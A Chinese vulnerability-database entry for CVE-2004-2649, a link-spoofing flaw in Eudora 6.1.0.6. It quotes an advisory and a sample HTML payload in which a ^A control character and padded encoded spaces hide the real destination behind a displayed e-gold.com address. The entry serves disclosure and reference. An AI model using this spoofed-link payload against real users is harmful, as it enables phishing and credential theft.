Qualcomm Eudora Embedded Hyperlink URI模糊漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107939 漏洞类型 输入验证
发布时间 2004-05-08 更新时间 2007-03-30
CVE编号 CVE-2004-2649 CNNVD-ID CNNVD-200412-676
漏洞平台 Windows CVSS评分 5.8
|漏洞来源
https://www.exploit-db.com/exploits/24098
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-676
|漏洞详情
Eudora6.1.0.6版本存在漏洞。远程攻击者可以通过在URL中间插入大量字符(如:编码为""的空格)来使显示在状态栏中URLs模糊。
|漏洞EXP
source: http://www.securityfocus.com/bid/10305/info

It has been reported that the Qualcomm Eudora MTA is prone to a URI obfuscation weakness that may hide the true contents of a link. The problem occurs when a user@location URI is formatted in such a way that a "^A" control character is located after the user value. The user value may then be appended with space characters to obfuscate status bar and mouseover details. It is said that, when doing a mouseover of such a URI, it will cause the status bar to only display the contents of the user value, not the entire link.

<a href="http://www.e-gold.com^A
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
@example.com/"><span lang=EN-US
style='mso-ansi-language:EN-US'>http://www.e-gold.com/alert</span></a><br>

Where example.com, reads egegold.com.
|参考资料

来源:XF
名称:eudora-url-spoofing(16105)
链接:http://xforce.iss.net/xforce/xfdb/16105
来源:OSVDB
名称:6009
链接:http://www.osvdb.org/6009
来源:www.eudora.com
链接:http://www.eudora.com/download/eudora/windows/6.1.2/RelNotes.txt
来源:BID
名称:10305
链接:http://www.securityfocus.com/bid/10305
来源:SECTRACK
名称:1010117
链接:http://securitytracker.com/alerts/2004/May/1010117.html
来源:SECUNIA
名称:11581
链接:http://secunia.com/advisories/11581
来源:BUGTRAQ
名称:20040508StatusbarexploithidesspoofedURLsEudora,possiblyothere-mailclients
链接:http://archives.neohapsis.com/archives/bugtraq/2004-05/0066.html